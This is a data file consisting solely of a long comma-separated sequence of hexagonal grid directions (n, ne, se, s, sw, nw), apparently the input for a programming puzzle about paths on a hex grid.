sw,s,sw,sw,nw,nw,nw,sw,sw,nw,sw,se,ne,sw,sw,sw,sw,ne,sw,sw,nw,sw,se,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,n,nw,sw,sw,sw,s,sw,sw,nw,n,s,sw,n,nw,nw,sw,sw,nw,sw,sw,se,sw,sw,nw,sw,sw,s,sw,nw,sw,nw,sw,nw,nw,nw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,s,sw,nw,nw,ne,n,nw,sw,sw,nw,sw,sw,nw,nw,nw,sw,sw,sw,ne,s,sw,nw,nw,sw,nw,sw,s,nw,n,nw,sw,sw,nw,nw,sw,nw,nw,n,sw,nw,sw,nw,sw,n,sw,nw,sw,sw,sw,sw,n,sw,n,nw,nw,s,sw,se,sw,sw,nw,n,sw,sw,sw,n,sw,nw,sw,ne,nw,sw,sw,s,n,nw,sw,nw,nw,nw,sw,sw,sw,nw,nw,ne,sw,s,sw,nw,n,sw,sw,sw,nw,ne,ne,sw,nw,nw,sw,s,s,sw,sw,nw,ne,sw,nw,sw,nw,nw,sw,sw,sw,sw,nw,nw,s,se,nw,sw,nw,ne,s,nw,nw,ne,sw,nw,nw,n,nw,nw,sw,sw,sw,nw,nw,nw,sw,nw,nw,n,sw,sw,nw,s,n,sw,nw,nw,sw,nw,n,nw,nw,nw,nw,nw,nw,sw,sw,n,n,sw,sw,nw,nw,nw,nw,ne,nw,nw,nw,sw,nw,nw,nw,nw,ne,nw,nw,nw,nw,n,nw,nw,nw,s,nw,nw,sw,nw,s,nw,ne,ne,nw,nw,sw,nw,nw,nw,nw,sw,nw,se,sw,nw,sw,nw,nw,ne,nw,n,nw,nw,sw,nw,nw,nw,sw,nw,ne,s,nw,nw,sw,s,nw,sw,sw,nw,nw,nw,sw,s,nw,nw,nw,nw,se,nw,s,nw,nw,nw,se,ne,ne,nw,nw,nw,nw,nw,sw,nw,ne,ne,nw,nw,nw,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,ne,nw,nw,s,nw,nw,ne,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,nw,nw,nw,ne,nw,n,nw,nw,ne,n,nw,sw,nw,n,nw,n,sw,nw,ne,s,se,n,ne,se,nw,ne,nw,ne,nw,ne,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,nw,ne,nw,s,se,nw,n,n,nw,ne,nw,nw,nw,nw,ne,nw,nw,s,nw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,n,nw,nw,s,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,sw,n,nw,nw,nw,nw,nw,nw,nw,s,nw,se,n,n,n,nw,se,nw,nw,s,s,nw,nw,n,nw,nw,s,nw,nw,nw,se,nw,nw,nw,se,nw,nw,nw,nw,se,nw,nw,nw,nw,nw,n,nw,n,ne,nw,nw,nw,se,ne,nw,nw,nw,n,nw,nw,ne,n,n,nw,nw,sw,nw,nw,nw,nw,se,nw,n,s,nw,nw,n,n,nw,se,n,nw,nw,nw,n,nw,nw,nw,n,nw,se,n,se,sw,s,n,s,nw,nw,nw,nw,n,n,s,nw,nw,se,nw,nw,se,nw,n,n,nw,n,se,nw,n,n,nw,n,nw,n,nw,nw,n,nw,n,s,nw,nw,nw,nw,ne,ne,se,sw,nw,n,n,nw,s,n,nw,nw,n,n,nw,n,nw,nw,nw,nw,nw,n,nw,n,n,sw,n,se,nw,n,n,nw,n,nw,nw,n,s,sw,nw,ne,nw,n,sw,nw,nw,n,nw,sw,s,nw,n,n,nw,se,n,nw,n,ne,n,nw,nw,n,nw,nw,n,nw,n,nw,nw,nw,n,se,sw,nw,nw,nw,sw,nw,nw,nw,nw,se,n,n,ne,n,nw,nw,n,nw,nw,n,sw,n,se,nw,nw,n,n,n,nw,n,nw,n,nw,n,ne,n,n,nw,n,n,n,nw,se,sw,n,sw,n,nw,nw,n,n,n,se,nw,sw,ne,n,se,nw,nw,n,n,n,n,n,n,nw,n,n,nw,sw,nw,n,sw,n,n,se,sw,n,n,n,nw,sw,nw,n,n,n,n,nw,n,n,nw,n,s,n,n,sw,n,nw,ne,s,nw,ne,n,n,n,ne,s,n,n,n,n,n,n,se,nw,nw,n,n,nw,n,n,s,se,n,nw,n,n,n,n,n,n,nw,n,n,n,nw,nw,nw,n,n,n,nw,nw,sw,n,se,n,s,n,n,n,n,n,n,ne,n,se,n,n,n,se,n,nw,n,nw,n,n,n,n,n,n,n,nw,n,n,n,n,n,n,ne,n,n,nw,n,n,sw,n,nw,n,n,sw,n,n,n,nw,se,n,n,n,nw,n,s,n,n,n,n,n,n,n,s,n,n,n,n,nw,n,n,sw,sw,nw,n,nw,nw,sw,n,n,n,n,n,n,n,n,n,n,n,s,n,n,n,n,nw,n,n,n,n,n,n,n,s,n,nw,n,sw,nw,ne,n,nw,n,sw,n,n,n,n,n,ne,n,nw,n,n,n,n,n,n,n,ne,n,n,n,n,ne,n,n,n,n,ne,n,n,n,n,ne,n,n,s,n,n,se,n,n,n,n,n,n,n,nw,n,ne,nw,sw,ne,nw,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,ne,n,n,se,n,ne,n,ne,n,n,n,n,ne,n,ne,se,s,ne,nw,se,n,n,n,n,se,n,n,ne,s,n,nw,n,nw,nw,n,n,n,n,n,n,n,n,n,s,n,n,n,s,n,nw,n,n,n,n,n,n,n,n,n,n,n,n,ne,ne,n,sw,n,se,n,n,n,n,n,n,n,se,n,ne,n,ne,n,n,n,n,n,sw,n,n,s,nw,n,n,n,ne,ne,n,n,n,ne,n,n,se,n,n,n,n,ne,n,n,n,s,n,se,ne,n,n,n,n,n,n,n,n,s,ne,s,nw,n,ne,s,ne,n,n,n,n,ne,n,n,n,n,n,n,n,n,n,ne,n,se,ne,n,ne,ne,ne,ne,se,n,n,ne,n,n,n,n,nw,ne,sw,ne,n,n,ne,se,n,n,n,n,se,n,n,n,ne,n,se,ne,ne,n,s,nw,n,ne,n,n,nw,n,n,ne,n,ne,n,sw,n,se,n,ne,nw,ne,ne,n,n,n,ne,n,ne,nw,n,s,n,n,n,n,ne,n,n,ne,n,nw,n,n,n,ne,n,s,n,n,n,n,n,ne,ne,n,sw,n,ne,n,n,sw,ne,n,ne,ne,n,n,ne,ne,ne,n,ne,ne,ne,n,ne,sw,n,n,ne,ne,ne,se,n,ne,ne,ne,n,nw,n,ne,n,n,n,ne,n,n,n,n,n,ne,ne,n,ne,s,nw,ne,n,ne,ne,ne,n,n,n,n,nw,n,n,ne,ne,ne,n,ne,n,ne,ne,n,ne,ne,nw,ne,nw,n,n,ne,se,ne,se,ne,n,nw,n,n,s,n,se,ne,ne,n,ne,n,ne,s,n,n,sw,ne,ne,se,n,ne,n,n,n,n,sw,ne,ne,nw,n,n,ne,ne,ne,n,ne,n,sw,ne,ne,ne,ne,n,ne,se,ne,sw,n,n,n,ne,ne,sw,ne,ne,ne,n,ne,ne,n,ne,se,ne,s,nw,n,sw,n,ne,n,n,n,n,ne,n,sw,ne,ne,nw,n,ne,se,ne,ne,ne,ne,n,ne,ne,n,ne,n,ne,ne,ne,n,s,s,ne,ne,ne,s,ne,ne,ne,sw,n,n,ne,n,s,ne,n,n,nw,n,se,sw,ne,ne,ne,s,n,n,ne,ne,n,ne,ne,nw,ne,ne,ne,s,se,ne,ne,ne,n,ne,nw,n,ne,ne,sw,n,n,ne,ne,ne,n,ne,ne,se,ne,ne,n,ne,ne,ne,sw,s,n,n,n,se,n,s,ne,ne,ne,sw,ne,ne,se,ne,ne,ne,ne,ne,n,s,se,ne,ne,ne,n,ne,sw,se,s,ne,n,ne,ne,n,n,n,ne,n,ne,ne,se,ne,ne,n,ne,ne,ne,ne,ne,s,ne,ne,ne,nw,ne,ne,ne,ne,ne,n,ne,s,ne,ne,ne,n,ne,sw,n,n,n,ne,ne,n,ne,s,n,n,n,ne,ne,n,ne,ne,ne,sw,se,sw,ne,ne,s,ne,nw,ne,nw,se,nw,n,ne,se,n,ne,ne,ne,ne,ne,s,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,ne,ne,ne,sw,ne,ne,ne,ne,n,ne,s,ne,s,ne,ne,n,ne,se,ne,ne,nw,n,ne,ne,ne,s,ne,sw,ne,n,ne,ne,n,ne,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,se,n,ne,ne,ne,ne,sw,ne,n,ne,se,ne,ne,ne,se,se,ne,sw,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,sw,ne,ne,ne,sw,n,n,ne,ne,n,ne,ne,ne,sw,ne,n,ne,ne,ne,se,ne,ne,nw,nw,sw,ne,ne,ne,ne,sw,ne,se,ne,n,ne,ne,ne,nw,ne,ne,ne,ne,ne,ne,sw,ne,ne,nw,ne,ne,ne,ne,ne,ne,ne,ne,sw,ne,ne,s,sw,ne,ne,s,sw,sw,ne,ne,ne,nw,ne,n,se,ne,ne,ne,ne,n,ne,nw,ne,ne,n,se,ne,ne,ne,ne,sw,ne,ne,s,ne,s,ne,ne,ne,ne,ne,ne,ne,nw,ne,ne,ne,se,ne,ne,ne,ne,se,ne,ne,sw,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,sw,n,ne,ne,nw,se,ne,ne,ne,ne,se,ne,sw,ne,ne,n,se,ne,ne,se,ne,sw,nw,ne,ne,ne,ne,ne,ne,s,ne,se,sw,ne,s,ne,se,se,se,ne,ne,s,ne,ne,s,ne,se,ne,nw,s,ne,se,ne,ne,ne,sw,ne,se,ne,ne,ne,sw,ne,ne,ne,ne,nw,ne,ne,nw,ne,ne,s,ne,ne,se,ne,ne,nw,ne,ne,se,se,se,ne,se,ne,se,se,ne,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,ne,ne,s,se,ne,sw,ne,ne,se,ne,ne,ne,ne,s,ne,se,ne,ne,se,n,n,ne,se,s,ne,s,ne,se,nw,ne,se,ne,ne,se,ne,se,se,ne,ne,se,ne,ne,ne,n,se,ne,ne,ne,ne,s,se,se,n,ne,se,se,ne,ne,se,ne,se,se,ne,ne,sw,ne,ne,ne,ne,ne,ne,nw,se,ne,se,ne,se,ne,s,ne,ne,sw,ne,ne,ne,ne,ne,s,se,ne,ne,s,se,ne,ne,ne,nw,ne,ne,ne,se,ne,ne,ne,ne,se,ne,ne,ne,se,ne,ne,se,n,s,ne,ne,ne,se,s,n,se,se,ne,sw,ne,ne,n,ne,se,n,se,n,s,n,s,ne,se,ne,ne,ne,ne,n,ne,se,sw,se,ne,se,nw,ne,ne,ne,se,se,ne,ne,ne,ne,ne,ne,ne,ne,nw,ne,n,s,ne,ne,ne,ne,ne,se,se,se,se,sw,s,n,ne,s,ne,ne,sw,se,se,ne,ne,ne,ne,ne,ne,se,se,s,ne,se,ne,nw,n,ne,se,se,ne,se,ne,ne,se,se,se,ne,ne,sw,se,nw,se,nw,se,se,se,se,ne,n,n,ne,se,se,ne,ne,se,ne,ne,se,ne,sw,ne,se,ne,n,se,nw,sw,ne,ne,se,ne,se,ne,ne,se,ne,se,ne,ne,ne,se,ne,se,se,n,nw,ne,ne,ne,ne,sw,n,ne,ne,ne,nw,ne,se,se,ne,ne,s,nw,n,ne,ne,ne,ne,ne,ne,ne,se,ne,sw,se,ne,s,n,ne,ne,se,ne,se,se,ne,se,ne,se,se,ne,se,se,se,ne,ne,ne,ne,se,ne,ne,nw,ne,ne,se,ne,s,se,ne,se,ne,ne,ne,ne,n,se,ne,se,se,ne,ne,ne,nw,ne,se,se,nw,ne,se,se,ne,sw,ne,ne,ne,n,ne,ne,ne,n,se,ne,se,ne,n,n,se,ne,se,se,se,ne,se,se,sw,se,ne,se,ne,sw,sw,ne,ne,ne,s,n,ne,ne,nw,ne,n,se,se,se,se,ne,nw,ne,ne,ne,se,ne,se,n,n,se,n,se,se,se,se,se,ne,sw,ne,se,ne,se,se,se,ne,sw,se,s,se,se,ne,se,se,se,n,ne,se,se,ne,ne,ne,ne,se,se,ne,se,se,ne,se,ne,ne,se,se,nw,se,se,ne,se,sw,se,ne,n,ne,se,se,se,nw,se,se,se,ne,se,ne,se,se,ne,se,se,ne,ne,se,se,sw,ne,se,se,sw,se,se,s,ne,ne,se,ne,s,ne,se,se,ne,se,nw,n,se,se,s,se,ne,se,ne,ne,sw,ne,ne,n,se,s,n,ne,se,se,ne,nw,ne,ne,se,se,ne,sw,ne,ne,ne,se,sw,ne,se,se,ne,n,ne,se,nw,se,se,se,ne,se,ne,ne,ne,s,ne,nw,ne,ne,ne,se,se,se,nw,se,ne,se,se,se,ne,se,ne,se,se,se,ne,se,se,se,n,se,ne,ne,se,se,se,se,sw,ne,se,se,se,ne,se,nw,n,ne,ne,ne,sw,n,se,n,se,se,n,ne,se,se,ne,se,ne,se,nw,se,se,se,s,sw,ne,se,sw,se,se,se,ne,ne,se,ne,se,se,se,se,ne,se,se,ne,se,se,ne,se,ne,se,se,se,ne,se,ne,ne,se,s,ne,ne,nw,se,ne,n,ne,se,se,ne,se,n,ne,ne,se,ne,se,se,se,ne,se,se,ne,ne,nw,ne,s,se,se,se,se,se,sw,nw,n,se,se,s,se,se,se,nw,se,n,nw,se,ne,ne,se,nw,se,se,se,se,se,se,ne,se,se,se,se,ne,se,se,ne,se,se,se,se,ne,se,se,se,se,ne,ne,nw,se,se,se,se,se,se,s,se,se,se,n,se,ne,ne,ne,se,se,se,se,ne,se,se,ne,se,se,se,se,se,se,se,sw,se,ne,ne,s,se,se,ne,se,se,se,ne,ne,se,se,se,se,se,se,se,s,sw,se,ne,se,se,se,se,se,se,se,n,se,sw,se,se,se,ne,se,se,se,se,se,s,ne,nw,se,se,se,se,se,sw,se,ne,sw,se,ne,se,se,ne,se,ne,n,ne,se,se,ne,se,ne,nw,nw,se,se,se,se,se,se,se,se,se,se,sw,se,se,se,se,se,nw,se,n,se,se,ne,se,se,nw,se,se,se,se,se,ne,nw,nw,se,se,se,se,ne,se,se,se,ne,ne,se,se,se,se,se,se,se,se,se,se,se,sw,s,se,se,ne,nw,se,se,se,se,se,se,sw,sw,se,ne,sw,nw,se,se,se,se,se,n,se,se,ne,se,se,se,nw,se,ne,se,se,se,s,se,se,n,se,se,ne,se,s,se,ne,se,se,se,nw,se,se,n,se,s,n,se,se,se,nw,se,s,sw,se,ne,se,se,se,nw,se,sw,se,se,sw,s,se,n,ne,sw,se,n,nw,se,ne,se,se,se,se,se,ne,se,se,se,se,se,se,se,se,n,se,se,se,ne,se,se,se,sw,se,nw,se,se,ne,se,se,se,se,n,ne,se,se,se,n,se,se,se,se,se,se,se,s,s,se,se,se,s,ne,se,se,se,se,se,se,se,se,se,se,se,se,se,n,n,se,se,se,se,se,se,se,se,se,s,sw,se,se,se,n,nw,se,se,se,se,ne,ne,se,n,se,se,sw,ne,sw,se,se,ne,se,se,se,se,se,se,se,se,se,n,se,nw,se,se,se,sw,s,se,se,se,se,se,se,se,se,ne,s,se,se,se,nw,s,se,n,se,se,se,s,sw,se,se,se,se,nw,ne,se,se,se,ne,s,se,sw,se,se,se,se,se,se,s,se,s,se,sw,se,ne,s,se,se,nw,se,se,nw,n,se,se,se,nw,nw,se,se,se,se,se,nw,s,se,se,ne,se,se,se,se,se,se,se,sw,se,se,se,se,se,se,nw,se,se,s,se,se,se,se,s,s,se,se,se,s,se,se,se,s,s,n,se,se,se,se,n,n,se,sw,nw,se,s,se,nw,se,s,nw,nw,se,s,se,se,se,se,se,se,sw,nw,se,se,s,se,se,se,se,se,se,n,n,ne,se,s,s,se,se,se,se,se,se,s,se,se,s,se,se,n,se,se,s,se,s,se,s,se,sw,se,se,sw,se,ne,se,sw,se,se,se,s,nw,se,ne,n,se,se,nw,se,ne,se,se,se,s,se,se,nw,se,s,se,se,se,nw,se,se,sw,s,se,s,se,se,nw,s,se,se,s,se,se,s,se,se,se,se,se,sw,s,se,se,s,sw,nw,ne,nw,se,nw,se,s,se,se,se,se,se,s,se,se,se,se,sw,s,sw,se,se,se,s,sw,sw,s,n,se,s,se,nw,se,se,se,ne,se,se,se,se,s,se,se,s,nw,s,se,s,nw,se,se,se,se,se,n,s,se,ne,n,se,se,nw,se,s,se,n,se,nw,s,s,s,se,nw,s,s,se,s,se,se,nw,s,se,s,se,se,se,se,n,se,se,s,se,se,se,se,s,s,se,s,se,se,s,se,s,n,se,n,se,se,s,se,s,se,se,s,s,se,se,s,se,se,se,se,s,s,s,se,s,nw,s,se,se,se,ne,nw,se,se,se,se,se,se,n,se,se,se,se,se,se,nw,se,se,se,s,s,nw,se,ne,se,s,se,ne,se,se,nw,se,se,se,sw,n,se,sw,se,se,nw,ne,s,se,sw,se,s,s,s,se,s,se,n,sw,sw,se,se,se,ne,se,s,se,sw,n,se,se,se,s,s,se,s,se,n,s,ne,se,se,s,se,se,s,sw,s,se,se,ne,s,n,se,se,se,s,s,s,se,se,s,s,ne,se,s,se,nw,se,s,se,se,s,s,s,se,n,se,se,ne,se,se,s,sw,se,s,ne,se,se,se,s,s,se,se,se,se,se,se,se,s,ne,se,s,se,s,s,nw,nw,s,s,nw,s,se,se,ne,se,se,se,n,s,s,s,s,se,se,s,s,s,nw,sw,se,s,s,n,se,s,s,s,s,n,s,se,s,s,se,sw,nw,nw,se,se,se,s,sw,se,se,se,s,se,se,s,s,s,se,ne,s,se,s,s,se,s,ne,se,se,se,se,se,se,ne,se,ne,s,se,se,se,se,se,s,s,s,n,se,nw,nw,s,se,sw,se,se,s,se,se,nw,s,s,s,ne,nw,se,se,se,n,ne,se,s,se,ne,se,ne,sw,ne,se,s,sw,se,se,se,s,s,ne,s,se,se,sw,s,s,s,s,se,se,s,s,se,s,se,s,s,nw,s,s,s,s,nw,nw,se,s,s,sw,s,se,nw,s,se,s,se,s,se,n,sw,n,ne,s,s,s,se,se,nw,s,n,se,s,s,s,se,s,s,s,sw,se,se,se,se,se,se,sw,s,nw,se,n,s,se,sw,nw,se,se,se,se,s,ne,se,ne,s,s,se,se,se,s,s,s,s,n,se,sw,n,s,nw,s,se,s,se,se,se,s,se,n,s,se,nw,se,s,s,se,se,se,s,s,n,s,se,s,s,s,se,se,se,s,s,s,s,se,se,s,se,s,s,s,s,s,s,s,s,nw,nw,se,n,sw,s,s,ne,s,nw,s,se,s,s,sw,s,se,nw,se,s,s,s,s,s,s,s,se,se,s,se,ne,s,se,se,se,s,s,s,se,ne,s,ne,s,s,se,s,s,ne,s,s,se,s,s,s,s,s,se,n,sw,n,s,se,se,s,s,nw,s,sw,se,n,s,se,s,s,sw,s,s,s,s,s,nw,s,nw,se,se,s,s,nw,se,s,s,sw,sw,s,se,se,s,s,s,se,s,se,s,s,s,se,s,ne,s,s,se,s,s,se,se,s,s,s,n,s,s,s,s,se,s,s,se,s,s,se,s,s,s,nw,se,s,s,se,se,se,nw,s,se,ne,s,se,s,n,nw,se,sw,se,se,s,se,s,se,s,sw,s,se,se,se,nw,s,s,s,s,sw,s,s,s,n,s,sw,s,s,se,se,se,s,se,s,s,s,se,s,se,se,nw,s,s,se,ne,s,se,s,se,se,se,s,s,s,s,se,s,s,s,s,se,s,s,s,s,se,se,se,sw,s,se,s,s,nw,s,s,se,s,se,s,se,s,sw,s,ne,s,s,ne,s,sw,s,s,ne,n,s,se,se,s,s,s,s,se,se,s,s,se,se,s,nw,s,s,n,s,ne,se,n,s,s,s,s,s,sw,s,n,n,s,s,sw,s,sw,n,se,s,s,s,s,nw,se,s,s,s,s,s,s,se,s,s,sw,s,s,s,se,se,ne,s,s,s,ne,se,se,s,s,se,n,n,se,n,sw,s,sw,se,nw,n,s,n,s,nw,sw,s,se,se,s,s,s,s,s,s,se,s,s,se,s,s,s,s,s,sw,se,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,nw,se,s,se,s,s,s,s,s,s,s,s,se,nw,se,s,s,s,se,nw,s,s,ne,s,s,se,se,sw,s,ne,n,s,s,se,n,ne,se,s,s,s,s,nw,s,ne,s,s,n,s,s,s,s,s,se,s,s,s,s,se,s,s,s,s,n,s,se,s,n,s,s,sw,s,s,s,s,s,se,s,ne,s,sw,n,s,n,se,nw,nw,s,sw,ne,n,sw,n,sw,s,n,s,se,s,se,s,s,s,s,nw,se,s,s,s,se,sw,s,se,s,s,s,s,s,s,s,s,s,s,se,ne,nw,s,s,s,s,s,se,s,ne,sw,se,se,sw,sw,s,se,ne,s,nw,ne,n,s,s,s,s,s,ne,s,s,s,s,se,s,se,s,s,s,sw,s,s,se,s,s,s,s,n,se,s,ne,s,s,s,s,se,sw,se,s,s,s,s,s,se,s,n,n,s,s,sw,s,s,s,s,ne,s,sw,s,s,s,s,s,sw,s,s,n,s,n,s,s,s,n,se,s,s,s,s,s,s,s,s,s,s,s,s,ne,sw,s,s,ne,nw,se,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,sw,s,s,s,nw,s,s,se,se,s,n,s,se,s,s,s,se,s,nw,s,s,s,s,se,s,s,s,ne,s,s,s,se,s,s,s,s,s,s,s,n,s,s,s,s,s,ne,s,s,s,s,sw,s,s,s,s,s,s,s,s,s,s,ne,se,sw,s,sw,s,s,s,se,s,s,s,s,se,s,s,ne,s,s,s,s,se,ne,se,n,n,n,n,n,n,nw,nw,sw,sw,nw,ne,sw,ne,sw,nw,sw,ne,s,sw,sw,sw,sw,s,sw,sw,sw,sw,nw,s,s,s,nw,s,s,s,se,s,se,s,se,n,se,s,se,s,nw,sw,se,se,s,se,se,se,se,se,se,se,se,nw,se,se,se,se,se,ne,se,ne,s,se,se,se,se,se,ne,ne,ne,ne,ne,ne,se,ne,ne,ne,ne,ne,ne,s,ne,nw,ne,sw,ne,ne,ne,ne,ne,ne,ne,se,n,ne,ne,se,ne,ne,n,se,ne,ne,sw,ne,ne,n,ne,n,ne,n,n,n,sw,n,ne,n,ne,ne,se,ne,n,n,ne,n,n,s,n,n,ne,n,s,n,n,n,s,n,ne,n,n,n,n,n,se,nw,nw,n,n,nw,n,se,n,sw,s,n,nw,nw,se,nw,nw,nw,nw,n,n,se,n,n,n,nw,nw,n,nw,ne,n,nw,n,nw,sw,nw,n,n,n,ne,se,nw,n,nw,n,n,nw,n,nw,n,nw,n,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,se,sw,sw,nw,se,nw,s,nw,nw,nw,nw,nw,nw,nw,s,n,nw,nw,nw,sw,nw,se,nw,nw,nw,nw,sw,sw,nw,s,sw,nw,s,nw,nw,sw,nw,sw,sw,nw,sw,se,nw,nw,nw,nw,nw,sw,sw,nw,se,sw,sw,nw,sw,nw,se,sw,nw,nw,nw,n,nw,sw,nw,ne,nw,nw,s,nw,nw,nw,sw,nw,sw,nw,sw,sw,sw,sw,n,sw,nw,s,sw,nw,ne,sw,n,s,sw,sw,sw,sw,ne,sw,sw,sw,nw,sw,s,sw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,se,n,sw,s,sw,sw,n,sw,sw,s,s,sw,sw,sw,sw,sw,sw,sw,s,s,sw,sw,sw,ne,sw,sw,s,sw,s,nw,sw,sw,se,se,sw,sw,sw,s,s,s,sw,nw,sw,nw,s,sw,sw,sw,sw,sw,sw,s,sw,s,sw,sw,sw,s,sw,s,sw,s,sw,s,sw,s,sw,s,sw,sw,s,s,s,sw,n,sw,s,n,s,s,s,sw,s,n,s,sw,sw,sw,sw,s,s,s,s,s,s,s,s,sw,sw,s,sw,se,s,s,s,sw,s,s,sw,s,ne,s,s,s,s,s,s,s,s,s,n,se,s,s,nw,s,s,s,se,s,s,s,s,s,s,s,s,s,s,nw,se,s,s,s,sw,s,s,s,s,s,s,s,ne,n,s,se,s,s,s,s,s,s,se,se,nw,nw,s,s,s,s,s,se,sw,s,s,se,s,s,s,s,s,s,s,s,s,n,s,s,s,se,s,s,s,s,s,s,se,s,s,n,s,s,se,s,s,s,se,s,s,nw,s,s,s,n,s,s,se,s,se,s,n,ne,s,s,s,s,se,ne,n,s,se,s,se,s,s,se,s,s,s,s,s,se,s,sw,s,se,se,s,se,s,s,ne,s,ne,ne,se,s,ne,se,s,ne,s,se,ne,se,se,se,sw,s,se,se,se,se,se,n,s,s,se,s,se,s,s,se,se,s,s,se,se,nw,se,ne,s,s,se,se,se,se,se,s,se,ne,se,se,s,ne,se,sw,se,se,se,se,se,nw,se,se,se,se,se,se,se,s,ne,n,sw,ne,se,se,se,se,se,ne,se,se,se,se,se,se,se,se,se,n,se,s,s,se,se,sw,nw,s,se,se,ne,se,se,ne,s,se,se,se,se,se,se,se,se,n,se,se,se,se,se,se,ne,se,ne,nw,se,se,ne,nw,nw,se,se,se,se,sw,se,se,sw,n,se,se,sw,se,se,se,se,nw,se,se,se,se,se,nw,sw,ne,ne,ne,se,ne,ne,nw,se,se,nw,se,se,se,se,se,ne,se,s,se,se,s,ne,se,ne,se,se,se,ne,s,se,ne,ne,ne,ne,se,n,se,se,se,se,ne,se,n,ne,se,se,se,ne,sw,nw,nw,ne,se,ne,se,se,se,n,se,ne,se,se,se,se,ne,se,ne,n,se,se,ne,nw,ne,ne,se,se,n,se,se,s,se,sw,ne,ne,ne,se,se,se,ne,ne,se,n,ne,ne,se,ne,ne,ne,se,ne,sw,n,ne,s,se,se,se,sw,ne,se,se,se,sw,ne,se,ne,ne,ne,sw,ne,ne,s,ne,s,ne,se,ne,ne,se,se,se,nw,ne,ne,ne,se,ne,se,se,ne,ne,ne,se,sw,ne,ne,ne,ne,se,ne,sw,ne,sw,ne,n,nw,sw,ne,ne,ne,sw,ne,se,sw,n,ne,ne,se,n,se,ne,n,ne,se,ne,nw,ne,ne,s,n,se,ne,nw,ne,se,ne,ne,ne,se,ne,se,se,ne,ne,ne,se,se,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,se,nw,ne,ne,ne,ne,ne,ne,ne,se,se,ne,ne,ne,se,ne,ne,ne,ne,ne,ne,ne,ne,nw,n,n,ne,nw,ne,ne,sw,se,ne,s,ne,nw,ne,nw,ne,ne,ne,ne,ne,ne,ne,n,n,ne,n,ne,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,n,n,ne,s,ne,ne,ne,nw,se,ne,nw,nw,ne,n,n,ne,ne,nw,ne,n,ne,sw,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,n,n,ne,ne,ne,ne,ne,n,n,ne,ne,se,sw,ne,n,ne,n,ne,ne,sw,ne,ne,n,ne,ne,se,sw,ne,ne,ne,s,n,n,s,ne,n,se,ne,ne,sw,s,ne,nw,n,n,ne,nw,ne,n,n,s,s,n,ne,ne,n,n,nw,ne,n,ne,ne,ne,ne,n,s,n,se,sw,se,ne,ne,ne,n,ne,ne,ne,n,nw,ne,n,n,ne,nw,ne,ne,sw,n,n,se,ne,n,ne,nw,se,ne,ne,ne,n,ne,ne,n,ne,ne,ne,ne,n,ne,ne,s,n,s,nw,n,n,nw,ne,ne,ne,s,n,s,ne,ne,ne,n,se,ne,ne,nw,n,n,n,ne,s,sw,n,ne,n,n,sw,n,ne,n,ne,n,sw,ne,ne,ne,sw,n,ne,ne,sw,ne,ne,n,n,se,ne,ne,s,ne,ne,n,nw,s,n,n,ne,nw,sw,ne,n,ne,ne,n,ne,n,se,n,ne,sw,sw,n,n,n,ne,ne,n,ne,n,s,ne,se,ne,nw,n,n,n,n,se,nw,ne,n,n,n,n,nw,nw,ne,n,se,ne,n,n,n,ne,n,ne,ne,ne,sw,n,s,n,n,n,ne,se,n,n,ne,ne,ne,sw,ne,ne,n,n,n,n,n,n,ne,ne,n,s,n,n,n,n,ne,ne,ne,n,n,se,nw,n,n,n,n,s,n,ne,n,n,n,n,n,n,n,n,sw,n,n,ne,n,n,n,s,ne,nw,n,nw,sw,n,n,n,n,s,n,n,ne,n,n,n,n,n,n,n,s,s,n,n,n,ne,n,s,ne,n,se,n,n,n,sw,n,n,n,ne,n,n,n,n,sw,se,n,sw,n,n,n,sw,ne,s,n,n,sw,s,se,n,n,n,n,ne,n,n,n,n,se,n,n,n,n,n,n,se,n,sw,n,n,n,nw,s,sw,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,sw,n,n,se,n,nw,se,n,sw,n,n,n,n,n,n,nw,n,n,n,n,n,n,n,n,n,sw,n,nw,ne,n,n,n,n,n,n,n,nw,n,n,sw,n,n,n,n,n,n,n,n,ne,n,s,n,n,n,n,ne,n,s,ne,n,n,n,nw,n,n,n,n,n,se,nw,n,nw,sw,n,n,ne,n,n,n,n,nw,n,n,n,nw,n,n,nw,n,n,n,sw,ne,n,n,s,n,n,n,nw,n,ne,n,nw,n,n,nw,nw,n,nw,nw,n,n,n,nw,sw,n,n,nw,sw,sw,n,nw,n,s,nw,n,s,nw,nw,nw,nw,n,se,n,n,nw,sw,nw,n,nw,n,ne,n,n,nw,nw,n,n,nw,nw,ne,nw,se,nw,nw,sw,n,n,n,sw,sw,n,n,n,n,nw,n,nw,nw,n,nw,n,nw,s,n,n,nw,nw,n,n,nw,n,sw,nw,nw,n,n,nw,nw,s,n,n,n,n,s,nw,n,n,n,n,n,nw,n,n,nw,n,nw,n,n,n,nw,n,n,nw,ne,nw,nw,n,nw,nw,n,n,nw,n,nw,ne,n,nw,n,n,nw,nw,nw,ne,nw,nw,n,n,n,se,ne,n,nw,n,n,n,n,nw,nw,n,nw,n,n,s,n,n,n,n,nw,n,nw,nw,se,n,nw,n,n,nw,nw,nw,nw,n,n,n,s,nw,nw,nw,ne,s,nw,nw,nw,n,nw,nw,sw,nw,n,nw,nw,n,nw,nw,n,nw,sw,n,n,n,n,nw,nw,nw,n,n,n,n,nw,n,n,ne,n,nw,nw,nw,ne,ne,n,n,nw,nw,ne,n,n